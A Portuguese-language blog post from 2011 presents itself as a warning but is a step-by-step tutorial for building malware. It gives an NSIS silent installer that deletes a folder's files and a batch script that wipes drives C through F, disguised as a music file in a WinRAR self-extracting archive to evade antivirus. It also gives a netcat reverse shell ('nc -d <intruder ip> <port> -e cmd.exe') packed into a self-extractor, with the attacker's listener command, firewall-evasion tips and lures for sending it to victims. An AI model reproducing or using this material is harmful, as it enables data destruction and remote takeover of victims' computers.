terça-feira, 22 de março de 2011

Aprenda a criar virus de maneira simples

Este tutorial tem como objetivo mostrar como um vírus simples pode ser criado de maneira rápida e fácil. E isso será feito para alertar os usuários! Devemos aprender como são feitos para ficarmos mais atentos, sabendo que hoje em dia qualquer pessoa com o mínimo de conhecimento é capaz de criar um software malicioso que poderá trazer consequências sérias para o usuário atacado.

Iremos mostrar três maneiras diferentes de se criar um vírus:
1)Utilizando o compilador Nsis
2)Criando um vírus indetectável
3)Criando vírus utilizando o NetCat

1 - Criando vírus com o NSIS
Esta parte do tutorial tem como objetivo mostrar a criação de um vírus utilizando o compilador NSIS, que é um software utilizado na criação de instaladores. O vírus criado irá apagar todos os arquivos de um determinado diretório.

1º passo
Abra um editor de texto qualquer, no exemplo utilizaremos o notepad (bloco de notas), vá ao menu INICIAR > EXECUTAR no campo digite notepad e tecle Enter.
Dentro da caixa de texto digite os seguintes comandos:

!define PRODUCT_NAME "Mensagem do virus"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "Nome do criador"
SetCompressor lzma
Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent
Section "Sec001" SEC01
Delete /REBOOTOK "C:\imagens\*.*"
SectionEnd


Na frente de Delete /REBOOTOK você deve colocar o caminho do diretório que terá seus arquivos apagados. A instrução *.* indica que todo o conteúdo será apagado.

2º passo
Na opção ARQUIVO > SALVAR COMO... , vá em SALVAR COMO TIPO selecione TODOS OS ARQUIVOS, logo em seguida escolha um nome para o seu arquivo com a extensão .nsi escolha um diretório qualquer para salvar o seu arquivo, no exemplo, colocamos o nome do arquivo como: vírus.nsi e salvamos ele no próprio Desktop, o nome do arquivo assim como diretório onde ele será salvo você pode escolher qualquer um, mas o importante é colocar a extensão .nsi.

3º passo
Abrir o compilador NSIS e clicar em “Compile NSI scripts”.
Na janela que será aberta clique em FILE -> LOAD SCRIPT... Procure no Desktop o arquivo vírus. Clique nele e em seguida cique em Abrir.

4º passo
Após o arquivo ser compilado clique em Close.
É importante observar que se você clicar em Test Installer o vírus será executado no seu computador. Por isso nunca faça isso.

5º passo
Pronto seu vírus foi criado!
Agora basta dar dois cliques nele que todos os seus arquivos que estão no diretório imagens será apagado. Não acredito que fazer isso no seu computador seja uma boa idéia rs...

2 - Criando vírus indetectável
Nessa Parte do tutorial, falaremos sobre a facilidade de como criar vírus indetectáveis, o vírus descrito nesta seção destrói o computador da vítima, ou seja, ele formata a partição raiz (C, pen drive, cartão SD e todas as outras partições que a pessoa tiver no computador.

Vamos explicar o passo a passo de como o vírus é construído:

1º passo
Abra um editor de texto qualquer, no exemplo utilizaremos o notepad (bloco de notas), vá ao menu INICIAR -> EXECUTAR no campo digite notepad e tecle Enter.

Dentro da caixa de texto digite os seguintes comandos:


@ECHO OFF
ECHO COLOQUE SUA MENSAGEM DE DESPEDIDA AQUI!
BREAK OFF
DELLTREE/y C:\*.*
DELLTREE/y D:\*.*
DELLTREE/y E:\*.*
DELLTREE/y F:\*.*


2º passo
Na opção ARQUIVO -> SALVAR COMO... , vá em SALVAR COMO TIPO selecione TODOS OS ARQUIVOS, logo em seguida escolha um nome para o seu arquivo com a extensão .bat escolha um diretório qualquer para salvar o seu arquivo, no exemplo, colocamos o nome do arquivo como: vírus.bat e salvamos ele no próprio Desktop, o nome do arquivo assim como diretório onde ele será salvo você pode escolher qualquer um, mas o importante é colocar a extensão .bat, pois este é o ponto chave deste tutorial.

3º passo
Nesse passo vamos camuflar o arquivo para torná-lo indetectável pelos anti-vírus. Será necessário possuir o programa Winrar. Nesta parte do tutorial, em cima do arquivo criado, clique com o botão direito do mouse e depois clique em adicionar para o arquivo... .

Logo em seguida marque a opção criar arquivo SFX.
Na aba AVANÇADO, clique em opções SFX, logo em seguida na caixa EXECUTAR ANTES DA EXECUÇÃO digite o nome que você escolheu para o seu arquivo com a extensão .bat. Na aba MÉTODOS, marque as opções OCULTAR TUDO e IGNORAR ARQUIVOS EXISTENTES.
Na aba TEXTO E ÍCONE, vá em CARREGAR ÍCONE SFX DO ARQUIVO, clique PROCURAR... e escolha um ícone que te agrade, no tutorial pegamos um ícone de música.
Logo em seguida clique em O.K.

Vá na opção CONFIGURAR SENHA, e escolha uma senha qualquer e depois clik em O.K.. Logo em seguida click em O.K. e novamente, para gerar o vírus, um novo arquivo será gerado.
Você pode testar e colocar o seu anti-vírus para scanear o vírus criado que ele não detectará o vírus. Este método do Winrar serve, para vírus, worm e trojans no geral. Quando a vítima abrir o arquivo vai pedir uma senha, mesmo que o infectado não saiba
a senha, não tem importância, pois o vírus será executado antes disso ocorrer. Você pode ainda compactar o arquivo para mandar para uma pessoa pelo msn.

3 - Criando vírus com o NetCat
Será mostrado aqui um exemplo de instalação de software malicioso que não será detectado por nenhum tipo de software antivírus ou antispyware, pois utilizará um software autêntico; nem tampouco será bloqueado pelo firewall pessoal do sistema operacional, pois efetuará sua conexão de forma reversa ao modo convencional utilizado na maioria dos softwares maliciosos, ou seja, ao invés de abrir uma porta para conexão do intruso, se conectará automaticamente ao intruso, opção que é liberada na maioria dos firewalls.

Esse exemplo usará as seguintes ferramentas:

• Netcat, software de conexão de aplicativos texto para execução remota
• WinRAR, software de compactação.
O funcionamento desse vírus é bastante simples. Será criado um arquivo auto-extraível como o WinRAR. Ao ser descompactado, esse arquivo executará o Netcar na configuração cliente, conectando diretamente ao computador do intruso, que aguardará pela conexão. Depois de estabelecida, o intruso tem acesso ao prompt de comandos da vítima, podendo ser usado para alterar qualquer tipo de configuração, ou ainda instalar novos softwares, bem como realizar qualquer tipo alteração no sistema de arquivos da vítima.

1º passo
Crie um novo arquivo compactado no WinRAR. Adicione a esse arquivo o executável do Netcat, nc.exe.

2º passo
Clique no botão com a legenda SFX, utilizado para a criação de arquivos auto-extraíveis. Nas configurações avançadas, indique o caminho para extração como “C:\windows\system32”, marcando como “Caminho absoluto”. E indique que, após a extração, o seguinte comando deve ser executado:

“nc –d ‘ip do intruso’ ‘porta’ –e cmd.exe”,

onde ‘ ip do intruso’ é o endereço de rede IP do computador do intruso que executará o servidor e ‘porta’ é uma porta escolhida para a conexão TCP. Para dificultar o bloqueio de firewalls, é conveniente usar portas muito utilizadas, como a porta 80, normalmente usada para servidores web.

3º passo
Ainda nas opções do arquivo auto-extraível, na aba “Métodos”, marque as opções “Ocultar tudo” e “Substituir todos os arquivos”.

4º passo
Após esse passo, um arquivo executável será gerado. O ícone e o nome desse arquivo podem ser alterados para chamar a atenção da vítima. Esse arquivo deve ser executado pela vítima. Logo, pode ser disponibilizado para download em algum site, ou enviado por email.
Normalmente são usadas mensagens chamando o usuário a executar esse arquivo como sefossem fotos, vídeos ou cartões.

5º passo
No computador do intruso, deverá ser executado também o software Netcat, configurado como servidor, para receber a conexão da vítima. O comando para essa execução deve ser:

“nc -l -n -p ‘porta’ –vv”,

Onde ‘porta’ é a porta TCP escolhida para a conexão.

Após a conexão pelo cliente, o intruso receberá o prompt de comandos do sistema da vítima.
A partir do prompt de comandos pode executar comandos, editar arquivos de configuração, acessar comandos de rede, etc.

Um comentário: